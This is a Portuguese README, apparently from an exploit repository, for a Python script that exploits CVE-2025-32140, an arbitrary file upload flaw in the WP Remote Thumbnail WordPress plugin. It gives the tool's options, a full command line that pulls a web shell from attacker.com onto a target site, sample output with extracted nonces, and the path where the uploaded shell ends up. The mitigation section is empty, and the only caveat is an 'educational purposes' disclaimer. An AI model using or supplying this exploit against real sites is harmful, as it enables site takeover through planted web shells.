
WordPress WP Remote Thumbnail Plugin <= 1.3.2 é vulnerável a Arbitrary File Upload
CVE-2025-32140 é uma vulnerabilidade crítica no plugin WP Remote Thumbnail para WordPress. Ela permite que atacantes autenticados (com permissões de contributor ou superiores) façam upload de arquivos arbitrários, como web shells, abusando de uma funcionalidade falha que aceita URLs não sanitizadas.
O plugin não valida o tipo ou conteúdo do arquivo obtido da URL remote_thumb fornecida. Isso permite que atacantes salvem arquivos PHP maliciosos (ex.: backdoors) no diretório /wp-content/uploads.
edit_post)Este script Python automatiza a exploração do CVE-2025-32140, executando os seguintes passos:
remote_thumb.| Opção | Alias | Descrição |
|---|---|---|
--url | -u | URL do site WordPress alvo (ex.: http://target.com/wordpress) |
--username | -un | Nome de usuário WordPress com privilégios de edição de posts |
--password | -p | Senha para o nome de usuário especificado |
--user_ID | -uid | ID do usuário WordPress (geralmente 1 para admin) |
--post_ID | -pid | ID do post a ser editado (pode ser um rascunho) |
--shell | URL direta de um web shell PHP hospedado no servidor do atacante |
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
Uma vez explorado, o web shell enviado provavelmente será armazenado em:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
Substitua YYYY/MM pelo ano e mês atuais do upload.
Para mitigar o risco representado por esta vulnerabilidade:
Este script é fornecido apenas para fins educacionais.
O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta exploração.
Por: Nxploited ( Khaled Alenazi ) 🌟